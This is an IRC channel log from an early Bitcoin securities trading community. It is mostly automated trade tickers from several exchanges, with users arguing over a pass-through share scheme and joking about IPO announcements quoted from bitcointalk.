news Jul 25 07:07:42 unclear whether anything is actually changing Jul 25 07:10:07 ok, where was that? Jul 25 07:10:11 @bitcointalk? Jul 25 07:11:21 [BTCTC] [AMC-PT] 188 @ 0.00379 = 0.7125 BTC [+] Jul 25 07:13:20 [HAVELOCK] [SMG] 408 @ 0.00027999 = 0.1142 BTC [-] Jul 25 07:14:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.0457 = 0.457 BTC [+] Jul 25 07:15:56 [BTCTC] [TAT.MINIGAME] 1 @ 0.000285 BTC [+] Jul 25 07:15:59 [BTCTC] [TAT.MINIGAME] 88 @ 0.000286 = 0.0252 BTC [+] Jul 25 07:16:13 Tat: are you still scamming people with your "pass thru" Jul 25 07:16:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.04588 = 0.2753 BTC [+] Jul 25 07:16:31 you let everyone know you dont actually have any mpex account and are just buying shares off of jurov's site Jul 25 07:16:32 [BTCTC] [TAT.ASICMINER] 11 @ 0.04588 = 0.5047 BTC [+] Jul 25 07:16:34 and flipping them Jul 25 07:16:53 wow Jul 25 07:16:55 that's serious shit Jul 25 07:17:07 what is? Jul 25 07:17:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.04588 BTC [+] Jul 25 07:19:03 [BTCTC] [GSDPT] 68 @ 0.00335 = 0.2278 BTC [-] Jul 25 07:19:05 what you are saying Jul 25 07:19:10 about TAT scamming people Jul 25 07:19:37 [BTCTC] [GSDPT] 95 @ 0.00332 = 0.3154 BTC [-] Jul 25 07:19:50 he doesnt have an mpex account Jul 25 07:19:57 hes just buying shares off of jurov's brokerage Jul 25 07:20:03 and adding a premium to flip them Jul 25 07:20:15 and claiming that its a pass thru Jul 25 07:20:19 elchespirito, it sounds like you haven't ignored someone you should have Jul 25 07:20:29 lemme guess, tiberiusix? Jul 25 07:20:30 its not really a scam its just failing to disclose the extra exposure Jul 25 07:20:32 [BTCTC] [GSDPT] 96 @ 0.003388 = 0.3252 BTC [+] Jul 25 07:20:45 sure because everyone can go on coinbr and do what hes doing Jul 25 07:20:53 the fucking loser is trying to make a few pennies for himself Jul 25 07:22:02 btw TAT Investments now runs a "real" MPEX account Jul 25 07:22:23 all CoinBr holdings of underlying assets will be transferred to it Jul 25 07:22:36 and CoinBr will no longer be used for underlying assets Jul 25 07:22:40 [BTCTC] [AMC-PT] 228 @ 0.00379 = 0.8641 BTC [+] Jul 25 07:23:04 this is not necessarily saying people shouldn't use CoinBr Jul 25 07:23:26 ok then I'll ignore tiberiusix Jul 25 07:23:28 then Jul 25 07:23:32 thanks man Jul 25 07:23:32 [BTCTC] [AMC-PT] 309 @ 0.00379 = 1.1711 BTC [+] Jul 25 07:23:36 Jurov has been great, it's just an extra layer that makes doing business better for us Jul 25 07:23:59 I will likely continue to keep a CoinBr account for personal long-term holdings Jul 25 07:27:01 you know, putting some disclosure on your PTs about your arbitraging activities is probably a good idea Jul 25 07:27:56 [BTCTC] [AMC-PT] 6 @ 0.0038 = 0.0228 BTC [+] Jul 25 07:29:11 [BTCTC] [DMS.MINING] 8 @ 0.01353 = 0.1082 BTC [-] Jul 25 07:29:15 [BTCTC] [DMS.MINING] 100 @ 0.01305 = 1.305 BTC [-] Jul 25 07:29:18 [BTCTC] [DMS.MINING] 25 @ 0.01302 = 0.3255 BTC [-] Jul 25 07:29:20 [BTCTC] [DMS.MINING] 20 @ 0.01301 = 0.2602 BTC [-] Jul 25 07:29:22 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003005 = 0.009 BTC [-] Jul 25 07:29:25 pretty sure some would see it as fraud Jul 25 07:34:24 [BTCTC] [BITVPS] 63 @ 0.00193 = 0.1216 BTC [+] Jul 25 07:36:37 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.003005 = 0.0391 BTC [-] Jul 25 07:37:24 dub I am trying to pm you to get some clarity, I know I've had issues getting pms thru to you in the past Jul 25 07:46:26 [BTCTC] [S.MPOE-PT] 500 @ 0.0009388 = 0.4694 BTC [+] Jul 25 07:47:28 [BTCTC] [AMC-PT] 91 @ 0.00379 = 0.3449 BTC [-] Jul 25 07:48:29 [BTCTC] [DMS.MINING] 30 @ 0.01301 = 0.3903 BTC [-] Jul 25 07:48:31 [BTCTC] [DMS.MINING] 20 @ 0.01301 = 0.2602 BTC [-] Jul 25 07:48:32 [BTCTC] [DMS.MINING] 1 @ 0.013 BTC [-] Jul 25 07:48:34 [BTCTC] [DMS.MINING] 4 @ 0.013 = 0.052 BTC [-] Jul 25 07:48:35 [BTCTC] [DMS.MINING] 6 @ 0.013 = 0.078 BTC [-] Jul 25 07:48:37 [BTCTC] [DMS.MINING] 80 @ 0.013 = 1.04 BTC [-] Jul 25 07:48:43 [HAVELOCK] [HIM] 1 @ 0.2325 BTC [-] Jul 25 07:50:27 [MPEX] [S.MPOE] 2948 @ 0.00079748 = 2.351 BTC [+] Jul 25 07:50:29 [MPEX] [S.MPOE] 3954 @ 0.00079908 = 3.1596 BTC [+] Jul 25 07:51:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.04588 = 0.1835 BTC [+] Jul 25 07:52:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.04589 = 0.2295 BTC [+] Jul 25 07:53:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.04589 BTC [+] Jul 25 07:53:40 [MPEX] [S.MPOE] 758 @ 0.00079908 = 0.6057 BTC [+] Jul 25 07:56:20 [BTCTC] [TAT.MINIGAME] 2 @ 0.000286 = 0.0006 BTC [+] Jul 25 07:56:24 [BTCTC] [TAT.MINIGAME] 19 @ 0.000286 = 0.0054 BTC [+] Jul 25 07:57:04 [MPEX] [S.MG] 36000 @ 0.0002595 = 9.342 BTC [-] Jul 25 07:59:06 [HAVELOCK] [VTX] 1 @ 0.5151 BTC [-] Jul 25 07:59:47 [HAVELOCK] [HIM] 1 @ 0.2435 BTC [+] Jul 25 07:59:57 [HAVELOCK] [AM100] 15 @ 0.04379869 = 0.657 BTC [-] Jul 25 08:00:10 Good morning superroot! How's trading? Jul 25 08:00:20 [HAVELOCK] [AM100] 2 @ 0.04379869 = 0.0876 BTC [-] Jul 25 08:00:39 [HAVELOCK] [AM100] 1 @ 0.04379869 BTC [-] Jul 25 08:00:42 TradeFartress: Good :D Jul 25 08:00:54 [BTCTC] [AMC-PT] 9 @ 0.00379 = 0.0341 BTC [-] Jul 25 08:00:55 [BTCTC] [ASICMINER-PT] 2 @ 4.61 = 9.22 BTC [-] Jul 25 08:00:57 [BTCTC] [AMC-PT] 94 @ 0.0038 = 0.3572 BTC [+] Jul 25 08:00:59 [BTCTC] [ASICMINER-PT] 5 @ 4.6 = 23 BTC [-] Jul 25 08:00:59 [BTCTC] [AMC-PT] 100 @ 0.0038 = 0.38 BTC [+] Jul 25 08:01:04 [BTCTC] [AMC-PT] 57 @ 0.003827 = 0.2181 BTC [+] Jul 25 08:01:28 [BTCTC] [DMS.SELLING] 8 @ 0.0185 = 0.148 BTC [-] Jul 25 08:01:34 [BTCTC] [TAT.MINIGAME] 95 @ 0.000286 = 0.0272 BTC [+] Jul 25 08:01:37 [BTCTC] [ASICMINER-PT] 1 @ 4.591 BTC [-] Jul 25 08:01:43 [BTCTC] [ASICMINER-PT] 1 @ 4.591 BTC [-] Jul 25 08:01:44 [BTCTC] [ASICMINER-PT] 2 @ 4.59 = 9.18 BTC [-] Jul 25 08:01:47 [BTCTC] [ASICMINER-PT] 4 @ 4.585 = 18.34 BTC [-] Jul 25 08:02:03 superroot: I am selling my code so people can make shitty chats like mine. Did you see it? Jul 25 08:02:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.04589 = 0.1377 BTC [+] Jul 25 08:02:31 [MPEX] [S.MPOE] 11668 @ 0.00079908 = 9.3237 BTC [+] Jul 25 08:03:03 TradeFartress, Link? Jul 25 08:03:54 superroot: https://bitcointalk.org/index.php?topic=250454 buy it! Jul 25 08:05:50 [MPEX] [S.MPOE] 14236 @ 0.00079908 = 11.3757 BTC [+] Jul 25 08:07:05 [BTCTC] [AMC-PT] 1 @ 0.00374 BTC [-] Jul 25 08:07:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.04589 BTC [+] Jul 25 08:09:29 [BTCTC] [DMS.MINING] 1 @ 0.013 BTC [-] Jul 25 08:12:50 [BTCTC] [TAT.ASICMINER] 14 @ 0.0457 = 0.6398 BTC [-] Jul 25 08:17:33 TradeFartress = Not real TradeFortress. Jul 25 08:18:00 There is only one TRADEFARTRESS Jul 25 08:18:27 TradeFartress: Who are you? Jul 25 08:19:03 BTCOxygen: I am TradeFartress who else? Jul 25 08:19:44 Follow me on twitter @TradeFartress http://redd.it/1izeya Jul 25 08:21:02 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 25 08:21:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.04589 = 0.0918 BTC [+] Jul 25 08:21:47 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 25 08:23:50 [BTCTC] [TAT.ASICMINER] 6 @ 0.04589 = 0.2753 BTC [+] Jul 25 08:24:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.04589 = 0.4589 BTC [+] Jul 25 08:27:44 [BTCTC] [AMC-PT] 38 @ 0.0038 = 0.1444 BTC [+] Jul 25 08:31:58 [BTCTC] [ASICMINER-PT] 1 @ 4.609 BTC [-] Jul 25 08:33:42 [BTCTC] [ASICMINER-PT] 1 @ 4.54 BTC [-] Jul 25 08:36:45 [BTCTC] [AMC-PT] 10 @ 0.00374 = 0.0374 BTC [-] Jul 25 08:37:51 [BTCTC] [ASICMINER-PT] 1 @ 4.52 BTC [-] Jul 25 08:38:25 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [-] Jul 25 08:38:27 [BTCTC] [ASICMINER-PT] 2 @ 4.502 = 9.004 BTC [-] Jul 25 08:39:15 [HAVELOCK] [AM100] 1 @ 0.04355 BTC [-] Jul 25 08:39:32 [BTCTC] [TAT.ASICMINER] 27 @ 0.0457 = 1.2339 BTC [-] Jul 25 08:41:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.04589 BTC [+] Jul 25 08:42:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.04589 BTC [+] Jul 25 08:42:55 [BTCTC] [AMC-PT] 119 @ 0.00374 = 0.4451 BTC [-] Jul 25 08:43:28 [BTCTC] [ASICMINER-PT] 3 @ 4.502 = 13.506 BTC [-] Jul 25 08:43:36 [BTCTC] [ASICMINER-PT] 15 @ 4.501 = 67.515 BTC [-] Jul 25 08:43:53 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 25 08:43:54 [HAVELOCK] [AM100] 1 @ 0.04355 BTC [-] Jul 25 08:43:57 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 25 08:43:58 [BTCTC] [ASICMINER-PT] 7 @ 4.49 = 31.43 BTC [-] Jul 25 08:46:28 [BTCTC] [ASICMINER-PT] 3 @ 4.49 = 13.47 BTC [-] Jul 25 08:48:14 [BTCTC] [BASIC-MINING] 1 @ 0.45 BTC [-] Jul 25 08:48:15 [BTCTC] [AMC-PT] 12 @ 0.0037 = 0.0444 BTC [-] Jul 25 08:48:24 [BTCTC] [AMC-PT] 6 @ 0.003636 = 0.0218 BTC [-] Jul 25 08:48:26 [BTCTC] [AMC-PT] 12 @ 0.003635 = 0.0436 BTC [-] Jul 25 08:48:28 [BTCTC] [AMC-PT] 565 @ 0.00362 = 2.0453 BTC [-] Jul 25 08:48:42 [BTCTC] [TAT.MINIGAME] 2796 @ 0.000286 = 0.7997 BTC [+] Jul 25 08:48:44 [BTCTC] [TAT.MINIGAME] 1750 @ 0.000286 = 0.5005 BTC [+] Jul 25 08:49:16 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [-] Jul 25 08:49:19 [BTCTC] [ASICMINER-PT] 7 @ 4.422 = 30.954 BTC [-] Jul 25 08:49:21 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 25 08:49:23 [BTCTC] [ASICMINER-PT] 4 @ 4.42 = 17.68 BTC [-] Jul 25 08:49:25 [BTCTC] [ASICMINER-PT] 1 @ 4.415 BTC [-] Jul 25 08:49:27 [BTCTC] [ASICMINER-PT] 2 @ 4.412 = 8.824 BTC [-] Jul 25 08:49:31 [BTCTC] [ASICMINER-PT] 5 @ 4.401 = 22.005 BTC [-] Jul 25 08:49:33 [BTCTC] [ASICMINER-PT] 19 @ 4.4 = 83.6 BTC [-] Jul 25 08:50:38 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003005 = 0.009 BTC [-] Jul 25 08:52:42 [BTCTC] [AMC-PT] 2450 @ 0.00362 = 8.869 BTC [-] Jul 25 08:53:02 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 25 08:53:07 [BTCTC] [ASICMINER-PT] 3 @ 4.4 = 13.2 BTC [-] Jul 25 08:53:41 [BTCTC] [BASIC-MINING] 1 @ 0.4967 BTC [+] Jul 25 08:53:42 [BTCTC] [BASIC-MINING] 1 @ 0.4967 BTC [+] Jul 25 08:53:43 [BTCTC] [BASIC-MINING] 2 @ 0.4967 = 0.9934 BTC [+] Jul 25 08:53:51 [BTCTC] [ASICMINER-PT] 5 @ 4.311 = 21.555 BTC [-] Jul 25 08:54:13 [BTCTC] [ASICMINER-PT] 3 @ 4.4 = 13.2 BTC [+] Jul 25 08:54:27 [BTCTC] [COGNITIVE] 1 @ 0.6424 BTC [+] Jul 25 08:54:29 [BTCTC] [COGNITIVE] 1 @ 0.6425 BTC [+] Jul 25 08:54:30 [BTCTC] [COGNITIVE] 1 @ 0.6425 BTC [+] Jul 25 08:54:45 [BTCTC] [ASICMINER-PT] 8 @ 4.31 = 34.48 BTC [-] Jul 25 08:55:38 [BTCTC] [COGNITIVE] 2 @ 0.647 = 1.294 BTC [+] Jul 25 08:57:27 [BTCTC] [BASIC-MINING] 1 @ 0.4983 BTC [+] Jul 25 08:57:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.0457 = 0.1828 BTC [-] Jul 25 08:57:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.0455 = 0.273 BTC [-] Jul 25 08:58:02 [BTCTC] [TAT.ASICMINER] 15 @ 0.04541 = 0.6812 BTC [-] Jul 25 08:58:08 [HAVELOCK] [AM100] 3 @ 0.04355 = 0.1307 BTC [-] Jul 25 08:58:11 [HAVELOCK] [AM100] 85 @ 0.0435999 = 3.706 BTC [+] Jul 25 08:58:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.0454 = 0.908 BTC [-] Jul 25 08:58:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.04537 = 0.4537 BTC [-] Jul 25 08:58:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.04533 = 0.3626 BTC [-] Jul 25 08:58:25 [BTCTC] [TAT.ASICMINER] 16 @ 0.04532 = 0.7251 BTC [-] Jul 25 08:58:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.0452 = 0.226 BTC [-] Jul 25 08:58:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [-] Jul 25 08:59:05 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 25 08:59:07 [BTCTC] [ASICMINER-PT] 2 @ 4.301 = 8.602 BTC [-] Jul 25 08:59:08 [BTCTC] [ASICMINER-PT] 3 @ 4.301 = 12.903 BTC [-] Jul 25 09:00:46 [BTCTC] [ASICMINER-PT] 1 @ 4.298 BTC [-] Jul 25 09:00:50 [BTCTC] [ASICMINER-PT] 5 @ 4.298 = 21.49 BTC [-] Jul 25 09:00:53 [BTCTC] [ASICMINER-PT] 1 @ 4.28 BTC [-] Jul 25 09:00:57 [BTCTC] [ASICMINER-PT] 5 @ 4.265 = 21.325 BTC [-] Jul 25 09:01:05 [BTCTC] [ASICMINER-PT] 2 @ 4.262 = 8.524 BTC [-] Jul 25 09:01:11 [BTCTC] [ASICMINER-PT] 1 @ 4.262 BTC [-] Jul 25 09:01:16 [BTCTC] [BASIC-MINING] 3 @ 0.45 = 1.35 BTC [-] Jul 25 09:01:18 [BTCTC] [ASICMINER-PT] 6 @ 4.262 = 25.572 BTC [-] Jul 25 09:01:28 [BTCTC] [BASIC-MINING] 3 @ 0.45 = 1.35 BTC [-] Jul 25 09:01:29 [BTCTC] [ASICMINER-PT] 10 @ 4.261 = 42.61 BTC [-] Jul 25 09:01:37 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [-] Jul 25 09:01:37 [BTCTC] [ASICMINER-PT] 6 @ 4.256 = 25.536 BTC [-] Jul 25 09:01:37 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [-] Jul 25 09:01:41 [BTCTC] [ASICMINER-PT] 3 @ 4.255 = 12.765 BTC [-] Jul 25 09:02:21 [BTCTC] [ASICMINER-PT] 5 @ 4.255 = 21.275 BTC [-] Jul 25 09:02:21 [BTCTC] [ASICMINER-PT] 20 @ 4.25 = 85 BTC [-] Jul 25 09:02:21 [BTCTC] [ASICMINER-PT] 4 @ 4.21 = 16.84 BTC [-] Jul 25 09:02:26 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 25 09:02:32 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 25 09:02:33 [BTCTC] [ASICMINER-PT] 5 @ 4.201 = 21.005 BTC [-] Jul 25 09:02:34 [BTCTC] [ASICMINER-PT] 5 @ 4.2 = 21 BTC [-] Jul 25 09:02:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.04499 = 0.225 BTC [-] Jul 25 09:03:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.04499 = 2.2495 BTC [-] Jul 25 09:03:05 [BTCTC] [TAT.ASICMINER] 11 @ 0.04451 = 0.4896 BTC [-] Jul 25 09:03:08 [BTCTC] [TAT.ASICMINER] 22 @ 0.0445 = 0.979 BTC [-] Jul 25 09:03:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04445 BTC [-] Jul 25 09:03:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.04444 = 0.0889 BTC [-] Jul 25 09:03:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.04441 = 0.1332 BTC [-] Jul 25 09:03:24 [BTCTC] [TAT.ASICMINER] 6 @ 0.0444 = 0.2664 BTC [-] Jul 25 09:03:32 [BTCTC] [BASIC-MINING] 5 @ 0.4 = 2 BTC [-] Jul 25 09:03:57 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [+] Jul 25 09:04:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0444 BTC [-] Jul 25 09:04:42 [HAVELOCK] [AM1] 1 @ 4.45 BTC [+] Jul 25 09:04:44 [HAVELOCK] [AM1] 3 @ 4.4 = 13.2 BTC [-] Jul 25 09:05:33 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003005 = 0.006 BTC [-] Jul 25 09:06:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.04401 = 1.1003 BTC [-] Jul 25 09:06:06 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [+] Jul 25 09:06:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.044 = 0.176 BTC [-] Jul 25 09:06:11 [BTCTC] [TAT.ASICMINER] 47 @ 0.044 = 2.068 BTC [-] Jul 25 09:06:14 [BTCTC] [TAT.ASICMINER] 22 @ 0.04379 = 0.9634 BTC [-] Jul 25 09:06:16 [BTCTC] [AMC-PT] 1000 @ 0.003605 = 3.605 BTC [-] Jul 25 09:06:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.04378 BTC [-] Jul 25 09:06:37 [BTCTC] [TAT.MINIGAME] 10000 @ 0.000285 = 2.85 BTC [-] Jul 25 09:07:43 [MPEX] [S.MG] 20000 @ 0.00026 = 5.2 BTC [+] Jul 25 09:10:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.04379 BTC [+] Jul 25 09:10:02 [BTCTC] [TAT.ASICMINER] 22 @ 0.04378 = 0.9632 BTC [-] Jul 25 09:10:07 [BTCTC] [TAT.ASICMINER] 51 @ 0.04378 = 2.2328 BTC [-] Jul 25 09:10:09 [BTCTC] [TAT.ASICMINER] 50 @ 0.04378 = 2.189 BTC [-] Jul 25 09:10:59 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 25 09:12:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.04378 = 0.1751 BTC [-] Jul 25 09:12:34 [BTCTC] [ASICMINER-PT] 3 @ 4.285 = 12.855 BTC [-] Jul 25 09:13:11 [MPEX] [S.MG] 10000 @ 0.00026 = 2.6 BTC [+] Jul 25 09:13:46 [BTCTC] [ASICMINER-PT] 2 @ 4.29 = 8.58 BTC [+] Jul 25 09:13:50 [BTCTC] [ASICMINER-PT] 1 @ 4.285 BTC [-] Jul 25 09:15:30 [BTCTC] [ASICMINER-PT] 1 @ 4.212 BTC [-] Jul 25 09:15:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.04377 = 0.0875 BTC [-] Jul 25 09:15:33 [BTCTC] [ASICMINER-PT] 1 @ 4.212 BTC [-] Jul 25 09:15:34 [BTCTC] [ASICMINER-PT] 1 @ 4.212 BTC [-] Jul 25 09:16:48 [BTCTC] [ASICMINER-PT] 1 @ 4.28 BTC [+] Jul 25 09:16:50 [BTCTC] [ASICMINER-PT] 1 @ 4.284 BTC [+] Jul 25 09:17:34 [BTCTC] [ASICMINER-PT] 2 @ 4.55 = 9.1 BTC [+] Jul 25 09:17:48 [BTCTC] [KENILWORTH] 200 @ 0.0018 = 0.36 BTC [-] Jul 25 09:18:26 [BTCTC] [ASICMINER-PT] 1 @ 4.284 BTC [-] Jul 25 09:18:28 [BTCTC] [ASICMINER-PT] 9 @ 4.285 = 38.565 BTC [+] Jul 25 09:19:10 [BTCTC] [ASICMINER-PT] 3 @ 4.285 = 12.855 BTC [+] Jul 25 09:19:43 [BTCTC] [ASICMINER-PT] 1 @ 4.285 BTC [+] Jul 25 09:19:48 [BTCTC] [ASICMINER-PT] 2 @ 4.285 = 8.57 BTC [+] Jul 25 09:19:50 [BTCTC] [ASICMINER-PT] 5 @ 4.29 = 21.45 BTC [+] Jul 25 09:19:52 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [+] Jul 25 09:20:36 [BTCTC] [ASICMINER-PT] 3 @ 4.55 = 13.65 BTC [+] Jul 25 09:20:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.04377 = 0.0875 BTC [-] Jul 25 09:21:25 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 25 09:21:50 [BTCTC] [BFMINES] 10 @ 0.0032 = 0.032 BTC [-] Jul 25 09:21:52 [BTCTC] [BFMINES] 200 @ 0.0032 = 0.64 BTC [-] Jul 25 09:23:05 [MPEX] [S.MG] 10953 @ 0.0002595 = 2.8423 BTC [-] Jul 25 09:23:27 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 25 09:23:46 how not to IPO: https://bitcointalk.org/index.php?topic=261983.msg2799608#msg2799608 Jul 25 09:26:27 [BTCTC] [ASICMINER-PT] 1 @ 4.291 BTC [-] Jul 25 09:26:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.0436 = 0.5232 BTC [-] Jul 25 09:27:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.04331 BTC [-] Jul 25 09:29:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0433 = 0.0866 BTC [-] Jul 25 09:29:34 [BTCTC] [TAT.ASICMINER] 34 @ 0.0433 = 1.4722 BTC [-] Jul 25 09:29:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0431 BTC [-] Jul 25 09:31:26 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [+] Jul 25 09:32:56 heh Jul 25 09:32:58 i guess so Jul 25 09:33:17 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 25 09:33:17 [BTCTC] [ASICMINER-PT] 1 @ 4.246 BTC [-] Jul 25 09:33:18 [BTCTC] [ASICMINER-PT] 2 @ 4.245 = 8.49 BTC [-] Jul 25 09:33:35 "We just don't feel right now it is the right moment to make the IPO as within 2 to 3 weeks we can IPO against a way better share price than we can now, and we have a responsability to our investors to find the best price possible. " Jul 25 09:33:36 herp Jul 25 09:33:50 two lines up he's talking about how x should have chosen words more carefully. Jul 25 09:33:57 [BTCTC] [COGNITIVE] 2 @ 0.647 = 1.294 BTC [+] Jul 25 09:34:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.0431 = 0.3017 BTC [-] Jul 25 09:34:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.043 = 0.129 BTC [-] Jul 25 09:34:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.043 = 0.301 BTC [-] Jul 25 09:34:34 [BTCTC] [ASICMINER-PT] 3 @ 4.55 = 13.65 BTC [+] Jul 25 09:34:35 [BTCTC] [TAT.ASICMINER] 20 @ 0.043 = 0.86 BTC [-] Jul 25 09:34:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.043 = 0.43 BTC [-] Jul 25 09:34:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [-] Jul 25 09:34:39 Our company valuation is based on 3 factors: Jul 25 09:34:39 3. The future potential of an IPO on bitfunder Jul 25 09:34:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.04251 BTC [-] Jul 25 09:34:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.0425 = 0.1275 BTC [-] Jul 25 09:34:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.04222 = 0.1267 BTC [-] Jul 25 09:34:44 yeah. really a good example. Jul 25 09:34:44 [BTCTC] [TAT.ASICMINER] 6 @ 0.04221 = 0.2533 BTC [-] Jul 25 09:34:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.04211 = 0.4211 BTC [-] Jul 25 09:34:49 [BTCTC] [TAT.ASICMINER] 60 @ 0.0421 = 2.526 BTC [-] Jul 25 09:35:05 so many choice lines Jul 25 09:35:15 "When looking at the future potential of an IPO on bitfunder, which for now is the earliest exit point for our investors," Jul 25 09:35:56 well, that whole section is awesome really Jul 25 09:36:11 "When looking at the future potential of an IPO on bitfunder, which for now is the earliest exit point for our investors, we can only make a decent analysis by looking at previous IPO's and company valuations. Considering the sale of SatoshiDice, Satoshi Poker will probably be the only pseudo-gaming asset on bitfunder (we are not gaming by Dutch law), amongst some mining farms and a Jul 25 09:36:11 webshop. Considering the fact that Satoshi Dice had an IPO of over 35K BTC in 3 days, selling only 10% of their company; considering that BitPride, a webshop, sold less than 5% of their shares for over 400BTC, considering a financial service called Ziggap did the same for 500 BTC, I think it is rediculous to value a profitable organisation with the growth and potential which we show Jul 25 09:36:11 lower than, with all due respect, a financial service which cooked the books and a t-shirt website which sells some bitcoins on the side." Jul 25 09:36:46 with all due respect, no offense Jul 25 09:37:10 herpderp. Jul 25 09:37:37 because s.dice ipo'd on havelock etc. Jul 25 09:38:14 and then this lavalips post just above Jul 25 09:38:22 appears to be a socking error Jul 25 09:38:29 or soemthing Jul 25 09:38:58 lolwut Jul 25 09:39:36 OP says: "It means that the original poster did not discuss with Ukyo prior to posting, which should have been done." Jul 25 09:40:16 maybe someone in the co has gone rogue? Jul 25 09:42:00 who knoes. Jul 25 09:42:45 another good one Jul 25 09:42:48 https://bitcointalk.org/index.php?topic=259772.msg2798540#msg2798540 Jul 25 09:42:53 [Smidge.Com] - A virtual, actively managed, multi-asset digital currency fund Jul 25 09:42:59 "I'm not sure about putting serious money in the hands of someone with only 3 months experience" Jul 25 09:43:08 says the guy with 3mos experience Jul 25 09:43:23 sigh Jul 25 09:44:36 lol Jul 25 09:44:48 we were having a good laugh about that few hours ago Jul 25 09:47:05 lolz at this thread is going places Jul 25 09:47:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.04584 = 0.2292 BTC [+] Jul 25 09:47:49 [BTCTC] [ASICMINER-PT] 1 @ 4.388 BTC [-] Jul 25 09:47:50 [BTCTC] [TAT.ASICMINER] 18 @ 0.04584 = 0.8251 BTC [+] Jul 25 09:47:53 [BTCTC] [ASICMINER-PT] 2 @ 4.389 = 8.778 BTC [+] Jul 25 09:48:00 [BTCTC] [BASIC-MINING] 7 @ 0.4 = 2.8 BTC [-] Jul 25 09:48:02 [BTCTC] [BASIC-MINING] 20 @ 0.4 = 8 BTC [-] Jul 25 09:48:04 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] Jul 25 09:49:44 [BTCTC] [ASICMINER-PT] 4 @ 4.389 = 17.556 BTC [+] Jul 25 09:49:45 [BTCTC] [BASIC-MINING] 9 @ 0.4 = 3.6 BTC [-] Jul 25 09:49:57 [BTCTC] [ASICMINER-PT] 1 @ 4.261 BTC [-] Jul 25 09:50:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.04584 = 0.1375 BTC [+] Jul 25 09:50:56 [BTCTC] [ASICMINER-PT] 4 @ 4.55 = 18.2 BTC [+] Jul 25 09:51:51 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 25 09:52:22 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 25 09:52:33 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 25 09:52:37 [BTCTC] [BASIC-MINING] 1 @ 0.38 BTC [-] Jul 25 09:52:50 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 25 09:54:35 [BTCTC] [ASICMINER-PT] 3 @ 4.55 = 13.65 BTC [+] Jul 25 09:54:56 [BTCTC] [ASICMINER-PT] 1 @ 4.293 BTC [-] Jul 25 